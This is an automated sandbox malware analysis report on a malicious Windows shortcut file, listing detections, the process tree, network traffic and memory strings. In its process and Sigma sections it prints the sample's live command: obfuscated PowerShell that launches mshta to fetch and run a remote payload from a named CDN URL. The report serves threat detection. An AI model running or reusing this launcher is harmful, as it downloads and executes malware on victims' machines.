Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PDp2UpMXz1.lnk

Overview

General Information

Sample name:PDp2UpMXz1.lnk
renamed because original name is a hash value
Original sample name:e22768aaf1e2f82438f62a41da5e664e127e492d93cb33f9a11e19f01c747333.lnk
Analysis ID:1512313
MD5:97e64a53ff0f88feb9e4d3111ca7ad0e
SHA1:fb9943861883ae789f0d23324a191d1f94502719
SHA256:e22768aaf1e2f82438f62a41da5e664e127e492d93cb33f9a11e19f01c747333
Tags:lnkPeakLight-Related
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • powershell.exe (PID: 7040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://fatodex.b-cdn.net/fatodex MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7156 cmdline: "C:\Windows\system32\mshta.exe" https://fatodex.b-cdn.net/fatodex MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 3300 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://fatodex.b-cdn.net/fatodex, CommandLine: "C:\Windows\system32\mshta.exe" https://fatodex.b-cdn.net/fatodex, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://fatodex.b-cdn.net/fatodex, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://fatodex.b-cdn.net/fatodex, ProcessId: 7156, ProcessName: mshta.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://fatodex.b-cdn.net/fatodex, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://fatodex.b-cdn.net/fatodex, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://fatodex.b-cdn.net/fatodex, ProcessId: 7040, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3300, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PDp2UpMXz1.lnkAvira: detected
Source: https://fatodex.b-cdn.net/fatodexAvira URL Cloud: Label: malware
Source: https://fatodex.b-cdn.net/fatodex?Avira URL Cloud: Label: malware
Source: fatodex.b-cdn.netVirustotal: Detection: 9%Perma Link
Source: PDp2UpMXz1.lnkVirustotal: Detection: 41%Perma Link
Source: PDp2UpMXz1.lnkReversingLabs: Detection: 44%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: PDp2UpMXz1.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 138.199.37.232:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.247.37:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.247.38:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.236.104:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.247.39:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 169.150.236.104 169.150.236.104
Source: Joe Sandbox ViewIP Address: 169.150.247.38 169.150.247.38
Source: Joe Sandbox ViewIP Address: 169.150.247.38 169.150.247.38
Source: Joe Sandbox ViewIP Address: 169.150.247.39 169.150.247.39
Source: Joe Sandbox ViewASN Name: ORANGE-BUSINESS-SERVICES-IPSN-ASNFR ORANGE-BUSINESS-SERVICES-IPSN-ASNFR
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /fatodex HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fatodex.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /assets/landingpage/css/unconfigured.css HTTP/1.1Accept: */*Referer: https://fatodex.b-cdn.net/fatodexAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunnycdn.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /v2/images/bunnynet-logo.svg HTTP/1.1Accept: */*Referer: https://fatodex.b-cdn.net/fatodexAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunny.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css?family=Rubik:300,400,500,700,900 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: fonts.bunny.net
Source: global trafficHTTP traffic detected: GET /assets/v2/images/general/il-bg-black-flower.svg HTTP/1.1Accept: */*Referer: https://fatodex.b-cdn.net/fatodexAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunnycdn.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css?family=Rubik:300,400,500,700,900 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.bunny.netConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /fatodex HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fatodex.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /assets/landingpage/css/unconfigured.css HTTP/1.1Accept: */*Referer: https://fatodex.b-cdn.net/fatodexAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunnycdn.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /v2/images/bunnynet-logo.svg HTTP/1.1Accept: */*Referer: https://fatodex.b-cdn.net/fatodexAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunny.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css?family=Rubik:300,400,500,700,900 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: fonts.bunny.net
Source: global trafficHTTP traffic detected: GET /assets/v2/images/general/il-bg-black-flower.svg HTTP/1.1Accept: */*Referer: https://fatodex.b-cdn.net/fatodexAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunnycdn.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css?family=Rubik:300,400,500,700,900 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.bunny.netConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: fatodex.b-cdn.net
Source: global trafficDNS traffic detected: DNS query: fonts.bunny.net
Source: global trafficDNS traffic detected: DNS query: bunnycdn.b-cdn.net
Source: global trafficDNS traffic detected: DNS query: bunny.net
Source: global trafficDNS traffic detected: DNS query: bunnycdn.com
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 17 Sep 2024 06:32:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: BunnyCDN-DE1-874CDN-RequestId: b7e9c01fd5af3d23c99639a5a9976cf0
Source: svchost.exe, 00000005.00000002.3359616791.000001E64E610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.bunny.net/
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3358228339.0000024D3AED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fonts.bunny.net/css?family=Rubik:300
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.bunny.net/s
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3356862679.000000AF565FC000.00000004.00000800.00020000.00000000.sdmp, il-bg-black-flower[1].svg.3.drString found in binary or memory: http://www.bohemiancoding.com/sketch
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BBD7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3358228339.0000024D3AED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bunny.net
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167160063.0000024D3BBAA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3357203743.000002453904E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BB50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/7
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/8
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/G
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/Q
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/U
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/g
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/k
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/lib/jquery/jquery.min.js
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3357203743.000002453904E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3358228339.0000024D3AED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svg
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svg...
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svg...2
Source: mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svg...5s.
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svg...ssu
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svg7
Source: mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svgcss/unconfigured.cssent
Source: mshta.exe, 00000003.00000002.3357203743.000002453902D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svggs/
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svgq
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svgroviderC
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svgx...Th
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/
Source: mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/EV
Source: mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/QV
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167160063.0000024D3BBB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3358228339.0000024D3AED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css:
Source: mshta.exe, 00000003.00000003.2167160063.0000024D3BBB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssC:
Source: mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssent
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/k
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com//
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3357203743.000002453904E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3356326998.000000AF55345000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3357203743.000002453901B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg
Source: mshta.exe, 00000003.00000002.3357203743.000002453904E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg)
Source: mshta.exe, 00000003.00000003.2167160063.0000024D3BBB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmp, unconfigured[1].css.3.drString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg);
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BB50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...
Source: mshta.exe, 00000003.00000002.3357203743.000002453904E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg2)x
Source: mshta.exe, 00000003.00000002.3357203743.0000024538F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgDAT
Source: mshta.exe, 00000003.00000002.3357203743.000002453904E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgJ
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/xt
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnynetassets.b-cdn.net/error.css
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnynetassets.b-cdn.net/error.png
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnynetassets.b-cdn.net/icons/arrow.svg
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnynetassets.b-cdn.net/icons/bunny.svg
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnynetassets.b-cdn.net/icons/origin.svg
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnynetassets.b-cdn.net/icons/x.svg
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnynetassets.b-cdn.net/icons/you.svg
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.statuspage.io/se-v2.js
Source: mshta.exe, 00000003.00000002.3357203743.000002453902D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-cdn.net/
Source: mshta.exe, 00000003.00000002.3357203743.0000024538F67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3361149106.0000024D40481000.00000004.00000020.00020000.00000000.sdmp, PDp2UpMXz1.lnkString found in binary or memory: https://fatodex.b-cdn.net/fatodex
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-cdn.net/fatodex...
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-cdn.net/fatodex...)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-cdn.net/fatodex?
Source: mshta.exe, 00000003.00000002.3357203743.0000024538F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-cdn.net/fatodexAC
Source: mshta.exe, 00000003.00000002.3357203743.0000024538F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-cdn.net/fatodexC:
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-cdn.net/fatodexE
Source: mshta.exe, 00000003.00000002.3357203743.0000024538F87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-cdn.net/fatodexG
Source: mshta.exe, 00000003.00000002.3357065102.0000024538F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-cdn.net/fatodexH
Source: mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-cdn.net/fatodexeEvent00
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-cdn.net/fatodexet-logo.svg0
Source: mshta.exe, 00000003.00000002.3357203743.0000024538F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-cdn.net/fatodexl
Source: mshta.exe, 00000003.00000002.3357203743.0000024538F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fatodex.b-cdn.net/fatodexn
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.b
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/
Source: mshta.exe, 00000003.00000003.2167160063.0000024D3BBB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/(=ET
Source: mshta.exe, 00000003.00000003.2167160063.0000024D3BBB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/H2
Source: mshta.exe, 00000003.00000002.3357203743.000002453904E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/css?family=Rubik
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/css?family=Rubik:300
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/r
